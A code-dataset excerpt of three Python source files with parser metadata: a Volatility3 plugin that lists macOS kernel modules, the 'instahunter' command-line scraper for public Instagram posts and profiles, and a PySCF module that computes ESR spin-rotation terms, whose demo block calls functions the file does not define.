architectures = ["Intel32", "Intel64"]),
requirements.SymbolTableRequirement(name = "darwin", description = "Mac kernel")
]
@classmethod
def list_modules(cls, context: interfaces.context.ContextInterface, layer_name: str, darwin_symbols: str):
"""Lists all the modules in the primary layer.
Args:
context: The context to retrieve required elements (layers, symbol tables) from
layer_name: The name of the layer on which to operate
darwin_symbols: The name of the table containing the kernel symbols
Returns:
A list of modules from the `layer_name` layer
"""
kernel = contexts.Module(context, darwin_symbols, layer_name, 0)
kernel_layer = context.layers[layer_name]
kmod_ptr = kernel.object_from_symbol(symbol_name = "kmod")
try:
kmod = kmod_ptr.dereference().cast("kmod_info")
except exceptions.InvalidAddressException:
return []
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return []
seen = set()
while kmod != 0 and \
kmod not in seen and \
len(seen) < 1024:
kmod_obj = kmod.dereference()
if not kernel_layer.is_valid(kmod_obj.vol.offset, kmod_obj.vol.size):
break
seen.add(kmod)
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return
def _generator(self):
for module in self.list_modules(self.context, self.config['primary'], self.config['darwin']):
mod_name = utility.array_to_string(module.name)
mod_size = module.size
yield 0, (format_hints.Hex(module.vol.offset), mod_name, mod_size)
def run(self):
return renderers.TreeGrid([("Offset", format_hints.Hex), ("Name", str), ("Size", int)], self._generator())
| [((41, 17, 41, 72), 'volatility3.framework.contexts.Module', 'contexts.Module', ({(41, 33, 41, 40): 'context', (41, 42, 41, 56): 'darwin_symbols', (41, 58, 41, 68): 'layer_name', (41, 70, 41, 71): '0'}, {}), '(context, darwin_symbols, layer_name, 0)', False, 'from volatility3.framework import renderers, interfaces, contexts\n'), ((23, 12, 25, 92), 'volatility3.framework.configuration.requirements.TranslationLayerRequirement', 'requirements.TranslationLayerRequirement', (), '', False, 'from volatility3.framework.configuration import requirements\n'), ((26, 12, 26, 92), 'volatility3.framework.configuration.requirements.SymbolTableRequirement', 'requirements.SymbolTableRequirement', (), '', False, 'from volatility3.framework.configuration import requirements\n'), ((81, 23, 81, 59), 'volatility3.framework.objects.utility.array_to_string', 'utility.array_to_string', ({(81, 47, 81, 58): 'module.name'}, {}), '(module.name)', False, 'from volatility3.framework.objects import utility\n'), ((84, 22, 84, 57), 'volatility3.framework.renderers.format_hints.Hex', 'format_hints.Hex', ({(84, 39, 84, 56): 'module.vol.offset'}, {}), '(module.vol.offset)', False, 'from volatility3.framework.renderers import format_hints\n')] |
Araekiel/instahunter | instahunter.py | c07c10773bcf33bdc0d46b39a0dda3f55936b1f3 | '''
instahunter.py
Author: Araekiel
Copyright: Copyright © 2019, Araekiel
License: MIT
Version: 1.6.3
'''
import click
import requests
import json
from datetime import datetime
@click.group()
def cli():
"""Made by Araekiel | v1.6.3"""
headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"}
@click.command()
@click.option('-tag', prompt="Hashtag", help="The hashtag you want to search the posts with")
@click.option('--post-type', default="latest", help="latest: Get latest posts | top: Get top posts")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getposts(tag, post_type, create_file, file_type):
"""This command will fetch latest or top public posts with a Hashtag"""
try:
# Creating file if required, creating array json_data to store data if the file type is json
if(create_file == "true"):
if(file_type == "json"):
file = open(tag+"_posts.json", "w+")
json_data = []
else:
file = open(tag+"_posts.txt", "w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/explore/tags/%s/?__a=1" % tag
req = requests.get(url=api_url, headers=headers)
data = req.json()
if(post_type == "top"):
edges = data["graphql"]["hashtag"]["edge_hashtag_to_top_posts"]["edges"]
else:
edges = data["graphql"]["hashtag"]["edge_hashtag_to_media"]["edges"]
# Looping through 'edges' in the data acquired
for edge in edges:
counter = counter + 1
# Collecting necessary data from each edge
try:
caption = edge["node"]["edge_media_to_caption"]["edges"][0]["node"]["text"]
except:
caption = "No Caption"
scraped_data = {
"id": counter,
"post_id": edge["node"]["id"],
"shortcode": edge["node"]["shortcode"],
"owner_id": edge["node"]["owner"]["id"],
"display_url": edge["node"]["display_url"],
"caption": caption,
"time": str(datetime.fromtimestamp(
edge["node"]["taken_at_timestamp"])),
"n_likes": edge["node"]["edge_liked_by"]["count"],
"n_comments": edge["node"]["edge_media_to_comment"]["count"],
"is_video": edge["node"]["is_video"]
}
if(create_file == "true"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
if(file_type == "json"):
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["owner_id"]), str(scraped_data["display_url"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["n_comments"]), str(scraped_data["is_video"])))
else:
click.echo("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
counter, scraped_data["post_id"], scraped_data["shortcode"], scraped_data["owner_id"], scraped_data["display_url"], scraped_data["caption"], scraped_data["time"], scraped_data["n_likes"], scraped_data["n_comments"], scraped_data["is_video"]))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_posts.json'" % tag)
else:
click.echo("File Created, name: '%s_posts.txt" % tag)
file.close()
else:
click.echo("Done!")
except:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-username', prompt="Username", help="Username you want to search the user with")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getuser(username, create_file, file_type):
"""This command will fetch user data with a Username"""
api_url = "https://www.instagram.com/%s/?__a=1" % username
try:
req = requests.get(url=api_url, headers=headers)
data = req.json()
# Collecting necessary data
user = data["graphql"]["user"]
if(user["highlight_reel_count"] > 0):
has_highlights = True
else:
has_highlights = False
scraped_data = {
"user_id": user["id"],
"username": user["username"],
"full_name": user["full_name"],
"profile_pic_url": user["profile_pic_url_hd"],
"bio": user["biography"],
"n_uploads": user["edge_owner_to_timeline_media"]["count"],
"n_followers": user["edge_followed_by"]["count"],
"n_following": user["edge_follow"]["count"],
"is_private": user["is_private"],
"is_verified": user["is_verified"],
"external_url": user["external_url"],
"igtv_videos": user["edge_felix_video_timeline"]["count"],
"has_highlights": has_highlights
}
if(create_file == "true"):
if(file_type == "json"):
file = open(username+"_user.json", "w+")
json.dump(scraped_data, file)
file.close()
click.echo("File Created, name: '%s_user.json'" % str(username))
else:
file = open(username+"_user.txt", "w+", encoding="utf-8")
file.write("User ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nBio: %s \nUploads: %s \nFollowers: %s \nFollowing: %s \nPrivate ID: %s \nVerified ID: %s \nExternal URL: %s \nIGTV videos: %s \nHas highlights: %s" % (
str(scraped_data["user_id"]), scraped_data["username"], scraped_data["full_name"], scraped_data["profile_pic_url"], scraped_data["bio"], str(scraped_data["n_uploads"]), str(scraped_data["n_followers"]), str(scraped_data["n_following"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"]), scraped_data["external_url"], str(scraped_data["igtv_videos"]), str(scraped_data["has_highlights"])))
file.close()
click.echo("File Created, name: '%s_user.txt'" % str(username))
else:
click.echo("User ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nBio: %s \nUploads: %s \nFollowers: %s \nFollowing: %s \nPrivate ID: %s \nVerified ID: %s \nExternal URL: %s \nIGTV videos: %s \nHas highlights: %s" % (
str(scraped_data["user_id"]), scraped_data["username"], scraped_data["full_name"], scraped_data["profile_pic_url"], scraped_data["bio"], str(scraped_data["n_uploads"]), str(scraped_data["n_followers"]), str(scraped_data["n_following"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"]), scraped_data["external_url"], str(scraped_data["igtv_videos"]), str(scraped_data["has_highlights"])))
click.echo('Done!')
except:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-username', prompt="Username", help='The username of the user you want to search the user id of')
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def getuserposts(username, create_file, file_type):
"""This command will fetch recent posts of a user with a Username"""
try:
# Creating file if required, creating array json_data to store data if the file type is json
if(create_file == "true"):
if(file_type == "json"):
file = open(username+"_posts.json", "w+")
json_data = []
else:
file = open(username+"_posts.txt", "w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/%s/?__a=1" % username
req = requests.get(url=api_url, headers=headers)
data = req.json()
posts = data["graphql"]["user"]["edge_owner_to_timeline_media"]["edges"]
# Looping through posts
for post in posts:
counter = counter + 1
node = post["node"]
# Collecting necessary data
try:
caption = node["edge_media_to_caption"]["edges"][0]["node"]["text"]
except:
caption = ""
try:
location = node["location"]["name"]
except:
location = "No Location"
scraped_data = {
"id": counter,
"post_id": node["id"],
"shortcode": node["shortcode"],
"display_url": node["display_url"],
"height": node["dimensions"]["height"],
"width": node["dimensions"]["width"],
"caption": caption,
"time": str(datetime.fromtimestamp(node["taken_at_timestamp"])),
"n_likes": node["edge_liked_by"]["count"],
"comments_disabled": node["comments_disabled"],
"n_comments": node["edge_media_to_comment"]["count"],
"location": location,
"is_video": node["is_video"]
}
if(create_file == "true"):
if(file_type == "json"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nDisplay URL: %s \nImage Height: %s \nImage Width: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nComments Disabled: %s \nNumber of comments: %s \nLocation: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["display_url"]), str(scraped_data["height"]), str(scraped_data["width"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["comments_disabled"]), str(scraped_data["n_comments"]), str(scraped_data["location"]), str(scraped_data["is_video"])))
else:
click.echo("###############################\nID: %s \nPost ID: %s \nShortcode: %s \nDisplay URL: %s \nImage Height: %s \nImage Width: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nComments Disabled: %s \nNumber of comments: %s \nLocation: %s \nIs Video: %s \n###############################\n\n\n\n\n" % (
str(counter), str(scraped_data["post_id"]), str(scraped_data["shortcode"]), str(scraped_data["display_url"]), str(scraped_data["height"]), str(scraped_data["width"]), str(scraped_data["caption"]), str(scraped_data["time"]), str(scraped_data["n_likes"]), str(scraped_data["comments_disabled"]), str(scraped_data["n_comments"]), str(scraped_data["location"]), str(scraped_data["is_video"])))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_posts.json'" % username)
else:
click.echo("File Created, name: '%s_posts.txt" % username)
file.close()
else:
click.echo("Done!")
except:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
@click.command()
@click.option('-query', prompt="Query", help="The term you want to search users with")
@click.option('-create-file', default="false", help="true: Create a file with the data | false: Will not create a file, false is default")
@click.option('--file-type', default="text", help="json: Create a json file | text: Create a text file, text is default")
def search(query, create_file, file_type):
"""This command searches for users on instagram"""
try:
if(create_file == "true"):
if(file_type == "json"):
file = open(query+"_users.json", "w+")
json_data = []
else:
file = open(query+"_users.text",
"w+", encoding="utf-8")
counter = 0
api_url = "https://www.instagram.com/web/search/topsearch/?query=%s" % query
req = requests.get(api_url, headers=headers)
data = req.json()
users = data["users"]
for user in users:
counter = counter + 1
scraped_data = {
"id": counter,
"user_id": user["user"]["pk"],
"username": user["user"]["username"],
"full_name": user["user"]["full_name"],
"profile_pic_url": user["user"]["profile_pic_url"],
"is_private": user["user"]["is_private"],
"is_verified": user["user"]["is_verified"],
}
if(create_file == "true"):
# If the file type is json then appending the data to json_data array instead of writing it to the file right away
if(file_type == "json"):
json_data.append(scraped_data)
else:
file.write("###############################\nID: %s \nUser ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nPrivate ID: %s \nVerified ID: %s \n###############################\n\n\n\n\n" % (str(counter), str(
scraped_data["user_id"]), str(scraped_data["username"]), str(scraped_data["full_name"]), str(scraped_data["profile_pic_url"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"])))
else:
click.echo("###############################\nID: %s \nUser ID: %s \nUsername: %s \nFull Name: %s \nProfile Pic URL: %s \nPrivate ID: %s \nVerified ID: %s \n###############################\n\n\n\n\n" % (str(counter), str(
scraped_data["user_id"]), str(scraped_data["username"]), str(scraped_data["full_name"]), str(scraped_data["profile_pic_url"]), str(scraped_data["is_private"]), str(scraped_data["is_verified"])))
if(create_file == "true"):
# Closing the file and dumping the data before closing if the file type is json
if(file_type == "json"):
json.dump(json_data, file)
click.echo("File Created, name: '%s_users.json'" %
query)
else:
click.echo("File Created, name: '%s_users.txt'" %
query)
file.close()
else:
click.echo("Done!")
except:
click.echo(
"Couldn't retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection")
cli.add_command(getposts)
cli.add_command(getuser)
cli.add_command(getuserposts)
cli.add_command(search)
if __name__ == "__main__":
cli()
| [((16, 1, 16, 14), 'click.group', 'click.group', ({}, {}), '()', False, 'import click\n'), ((22, 1, 22, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((23, 1, 23, 93), 'click.option', 'click.option', (), '', False, 'import click\n'), ((24, 1, 24, 100), 'click.option', 'click.option', (), '', False, 'import click\n'), ((25, 1, 25, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((26, 1, 26, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((92, 1, 92, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((93, 1, 93, 95), 'click.option', 'click.option', (), '', False, 'import click\n'), ((94, 1, 94, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((95, 1, 95, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((146, 1, 146, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((147, 1, 147, 112), 'click.option', 'click.option', (), '', False, 'import click\n'), ((148, 1, 148, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((149, 1, 149, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((218, 1, 218, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((219, 1, 219, 86), 'click.option', 'click.option', (), '', False, 'import click\n'), ((220, 1, 220, 138), 'click.option', 'click.option', (), '', False, 'import click\n'), ((221, 1, 221, 121), 'click.option', 'click.option', (), '', False, 'import click\n'), ((39, 14, 39, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((102, 14, 102, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((162, 14, 162, 56), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((234, 14, 234, 52), 'requests.get', 'requests.get', (), '', False, 'import requests\n'), ((87, 12, 87, 31), 'click.echo', 'click.echo', ({(87, 23, 87, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((89, 8, 90, 193), 'click.echo', 'click.echo', ({(90, 12, 90, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((140, 12, 140, 31), 'click.echo', 'click.echo', ({(140, 23, 140, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((142, 8, 143, 193), 'click.echo', 'click.echo', ({(143, 12, 143, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((212, 12, 212, 31), 'click.echo', 'click.echo', ({(212, 23, 212, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((214, 8, 215, 193), 'click.echo', 'click.echo', ({(215, 12, 215, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((269, 12, 269, 31), 'click.echo', 'click.echo', ({(269, 23, 269, 30): '"""Done!"""'}, {}), "('Done!')", False, 'import click\n'), ((271, 8, 272, 193), 'click.echo', 'click.echo', ({(272, 12, 272, 192): '"""Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""'}, {}), '(\n """Couldn\'t retrieve data, One of the following was the issue: \n1. Your query was wrong \n2. Instagram servers did not respond \n3. There is a problem with your internet connection"""\n )', False, 'import click\n'), ((76, 16, 77, 262), 'click.echo', 'click.echo', ({(76, 27, 77, 261): '("""###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n"""\n % (counter, scraped_data[\'post_id\'], scraped_data[\'shortcode\'],\n scraped_data[\'owner_id\'], scraped_data[\'display_url\'], scraped_data[\n \'caption\'], scraped_data[\'time\'], scraped_data[\'n_likes\'], scraped_data\n [\'n_comments\'], scraped_data[\'is_video\']))'}, {}), '(\n """###############################\nID: %s \nPost ID: %s \nShortcode: %s \nOwner ID: %s \nDisplay URL: %s \nCaption: %s \nTime: %s \nNumber of likes: %s \nNumber of comments: %s \nIs Video: %s \n###############################\n\n\n\n\n"""\n % (counter, scraped_data[\'post_id\'], scraped_data[\'shortcode\'],\n scraped_data[\'owner_id\'], scraped_data[\'display_url\'], scraped_data[\n \'caption\'], scraped_data[\'time\'], scraped_data[\'n_likes\'], scraped_data\n [\'n_comments\'], scraped_data[\'is_video\']))', False, 'import click\n'), ((81, 16, 81, 42), 'json.dump', 'json.dump', ({(81, 26, 81, 35): 'json_data', (81, 37, 81, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((82, 16, 82, 71), 'click.echo', 'click.echo', ({(82, 27, 82, 70): '("File Created, name: \'%s_posts.json\'" % tag)'}, {}), '("File Created, name: \'%s_posts.json\'" % tag)', False, 'import click\n'), ((84, 16, 84, 69), 'click.echo', 'click.echo', ({(84, 27, 84, 68): '("File Created, name: \'%s_posts.txt" % tag)'}, {}), '("File Created, name: \'%s_posts.txt" % tag)', False, 'import click\n'), ((128, 16, 128, 45), 'json.dump', 'json.dump', ({(128, 26, 128, 38): 'scraped_data', (128, 40, 128, 44): 'file'}, {}), '(scraped_data, file)', False, 'import json\n'), ((206, 16, 206, 42), 'json.dump', 'json.dump', ({(206, 26, 206, 35): 'json_data', (206, 37, 206, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((207, 16, 207, 76), 'click.echo', 'click.echo', ({(207, 27, 207, 75): '("File Created, name: \'%s_posts.json\'" % username)'}, {}), '("File Created, name: \'%s_posts.json\'" % username)', False, 'import click\n'), ((209, 16, 209, 74), 'click.echo', 'click.echo', ({(209, 27, 209, 73): '("File Created, name: \'%s_posts.txt" % username)'}, {}), '("File Created, name: \'%s_posts.txt" % username)', False, 'import click\n'), ((261, 16, 261, 42), 'json.dump', 'json.dump', ({(261, 26, 261, 35): 'json_data', (261, 37, 261, 41): 'file'}, {}), '(json_data, file)', False, 'import json\n'), ((262, 16, 263, 33), 'click.echo', 'click.echo', ({(262, 27, 263, 32): '("File Created, name: \'%s_users.json\'" % query)'}, {}), '("File Created, name: \'%s_users.json\'" % query)', False, 'import click\n'), ((265, 16, 266, 33), 'click.echo', 'click.echo', ({(265, 27, 266, 32): '("File Created, name: \'%s_users.txt\'" % query)'}, {}), '("File Created, name: \'%s_users.txt\'" % query)', False, 'import click\n'), ((62, 28, 63, 55), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(63, 20, 63, 54): "edge['node']['taken_at_timestamp']"}, {}), "(edge['node']['taken_at_timestamp'])", False, 'from datetime import datetime\n'), ((186, 28, 186, 78), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', ({(186, 51, 186, 77): "node['taken_at_timestamp']"}, {}), "(node['taken_at_timestamp'])", False, 'from datetime import datetime\n')] |
azag0/pyscf | pyscf/prop/esr/uks.py | 1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b | #!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
def para(obj, mo10, mo_coeff, mo_occ, qed_fac=1):
mol = obj.mol
effspin = mol.spin * .5
muB = .5 # Bohr magneton
#qed_fac = (nist.G_ELECTRON - 1)
orboa = mo_coeff[0][:,mo_occ[0]>0]
orbob = mo_coeff[1][:,mo_occ[1]>0]
dm0a = numpy.dot(orboa, orboa.T)
dm0b = numpy.dot(orbob, orbob.T)
dm10a = [reduce(numpy.dot, (mo_coeff[0], x, orboa.T)) for x in mo10[0]]
dm10b = [reduce(numpy.dot, (mo_coeff[1], x, orbob.T)) for x in mo10[1]]
dm10a = numpy.asarray([x-x.T for x in dm10a])
dm10b = numpy.asarray([x-x.T for x in dm10b])
hso1e = uhf_esr.make_h01_soc1e(obj, mo_coeff, mo_occ, qed_fac)
para1e =-numpy.einsum('xji,yij->xy', dm10a, hso1e)
para1e+= numpy.einsum('xji,yij->xy', dm10b, hso1e)
para1e *= 1./effspin / muB
#_write(obj, align(para1e)[0], 'SOC(1e)/OZ')
if obj.para_soc2e:
raise NotImplementedError('dia_soc2e = %s' % obj.dia_soc2e)
para = para1e
return para
# Treat Vxc as one-particle operator Vnuc
def get_vxc_soc(ni, mol, grids, xc_code, dms, max_memory=2000, verbose=None):
xctype = ni._xc_type(xc_code)
make_rho, nset, nao = ni._gen_rho_evaluator(mol, dms, hermi=1)
ngrids = len(grids.weights)
BLKSIZE = numint.BLKSIZE
blksize = min(int(max_memory/12*1e6/8/nao/BLKSIZE)*BLKSIZE, ngrids)
shls_slice = (0, mol.nbas)
ao_loc = mol.ao_loc_nr()
vmat = numpy.zeros((2,3,nao,nao))
if xctype == 'LDA':
buf = numpy.empty((4,blksize,nao))
ao_deriv = 1
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao[0], mask, 'LDA')
rho_b = make_rho(1, ao[0], mask, 'LDA')
vxc = ni.eval_xc(xc_code, (rho_a, rho_b), 1, deriv=1)[1]
vrho = vxc[0]
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,0])
_cross3x3_(vmat[0], mol, aow, ao[1:], mask, shls_slice, ao_loc)
aow = numpy.einsum('xpi,p->xpi', ao[1:], weight*vrho[:,1])
_cross3x3_(vmat[1], mol, aow, ao[1:], mask, shls_slice, ao_loc)
rho = vxc = vrho = aow = None
elif xctype == 'GGA':
buf = numpy.empty((10,blksize,nao))
ao_deriv = 2
for ao, mask, weight, coords \
in ni.block_loop(mol, grids, nao, ao_deriv, max_memory,
blksize=blksize, buf=buf):
rho_a = make_rho(0, ao, mask, 'GGA')
rho_b = make_rho(1, ao, mask, 'GGA')
vxc = ni.eval_xc(xc_code, (rho_a,rho_b), 1, deriv=1)[1]
wva, wvb = numint._uks_gga_wv0((rho_a, rho_b), vxc, weight)
ip_ao = ao[1:4]
ipip_ao = ao[4:]
aow = rks_grad._make_dR_dao_w(ao, wva)
_cross3x3_(vmat[0], mol, aow, ip_ao, mask, shls_slice, ao_loc)
aow = rks_grad._make_dR_dao_w(ao, wvb)
_cross3x3_(vmat[1], mol, aow, ip_ao, mask, shls_slice, ao_loc)
rho = vxc = vrho = vsigma = wv = aow = None
vmat = vmat - vmat.transpose(0,1,3,2)
else:
raise NotImplementedError('meta-GGA')
return vmat
def _cross3x3_(out, mol, ao1, ao2, mask, shls_slice, ao_loc):
out[0] += numint._dot_ao_ao(mol, ao1[1], ao2[2], mask, shls_slice, ao_loc)
out[0] -= numint._dot_ao_ao(mol, ao1[2], ao2[1], mask, shls_slice, ao_loc)
out[1] += numint._dot_ao_ao(mol, ao1[2], ao2[0], mask, shls_slice, ao_loc)
out[1] -= numint._dot_ao_ao(mol, ao1[0], ao2[2], mask, shls_slice, ao_loc)
out[2] += numint._dot_ao_ao(mol, ao1[0], ao2[1], mask, shls_slice, ao_loc)
out[2] -= numint._dot_ao_ao(mol, ao1[1], ao2[0], mask, shls_slice, ao_loc)
return out
# Jia, start to work here
class ESR(uhf_esr.ESR):
'''dE = B dot gtensor dot s'''
def __init__(self, scf_method):
uhf_esr.ESR.__init__(self, scf_method)
self.dia_soc2e = False
self.para_soc2e = False
def para(self, mo10=None, mo_coeff=None, mo_occ=None):
if mo_coeff is None: mo_coeff = self._scf.mo_coeff
if mo_occ is None: mo_occ = self._scf.mo_occ
if mo10 is None:
self.mo10, self.mo_e10 = self.solve_mo1()
mo10 = self.mo10
return para(self, mo10, mo_coeff, mo_occ)
#make_para_soc2e = make_para_soc2e
get_fock = uks_nmr.get_fock
if __name__ == '__main__':
from pyscf import gto, scf
mol = gto.M(atom='H 0 0.1 0; H 0 0 1.',
basis='ccpvdz', spin=1, charge=-1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
esr_obj = ESR(mf)
esr_obj.gauge_orig = (0,0,0)
esr_obj.para_soc2e = False
esr_obj.so_eff_charge = True
print(esr_obj.kernel())
mol = gto.M(atom='''
H 0 0 1
H 1.2 0 1
H .1 1.1 0.3
H .8 .7 .6
''',
basis='ccpvdz', spin=1, charge=1, verbose=3)
mf = scf.UKS(mol).set(xc='bp86').run()
gobj = GTensor(mf)
#print(gobj.kernel())
gobj.para_soc2e = 'SSO'
gobj.dia_soc2e = None
gobj.so_eff_charge = False
nao, nmo = mf.mo_coeff[0].shape
nelec = mol.nelec
numpy.random.seed(1)
mo10 =[numpy.random.random((3,nmo,nelec[0])),
numpy.random.random((3,nmo,nelec[1]))]
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05)
numpy.random.seed(1)
dm0 = numpy.random.random((2,nao,nao))
dm0 = dm0 + dm0.transpose(0,2,1)
dm10 = numpy.random.random((2,3,nao,nao))
dm10 = dm10 - dm10.transpose(0,1,3,2)
print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
| [((49, 11, 49, 36), 'numpy.dot', 'numpy.dot', ({(49, 21, 49, 26): 'orboa', (49, 28, 49, 35): 'orboa.T'}, {}), '(orboa, orboa.T)', False, 'import numpy, sys\n'), ((50, 11, 50, 36), 'numpy.dot', 'numpy.dot', ({(50, 21, 50, 26): 'orbob', (50, 28, 50, 35): 'orbob.T'}, {}), '(orbob, orbob.T)', False, 'import numpy, sys\n'), ((53, 12, 53, 49), 'numpy.asarray', 'numpy.asarray', ({(53, 26, 53, 48): '[(x - x.T) for x in dm10a]'}, {}), '([(x - x.T) for x in dm10a])', False, 'import numpy, sys\n'), ((54, 12, 54, 49), 'numpy.asarray', 'numpy.asarray', ({(54, 26, 54, 48): '[(x - x.T) for x in dm10b]'}, {}), '([(x - x.T) for x in dm10b])', False, 'import numpy, sys\n'), ((56, 12, 56, 66), 'pyscf.prop.esr.uhf.make_h01_soc1e', 'uhf_esr.make_h01_soc1e', ({(56, 35, 56, 38): 'obj', (56, 40, 56, 48): 'mo_coeff', (56, 50, 56, 56): 'mo_occ', (56, 58, 56, 65): 'qed_fac'}, {}), '(obj, mo_coeff, mo_occ, qed_fac)', True, 'from pyscf.prop.esr import uhf as uhf_esr\n'), ((58, 13, 58, 54), 'numpy.einsum', 'numpy.einsum', ({(58, 26, 58, 39): 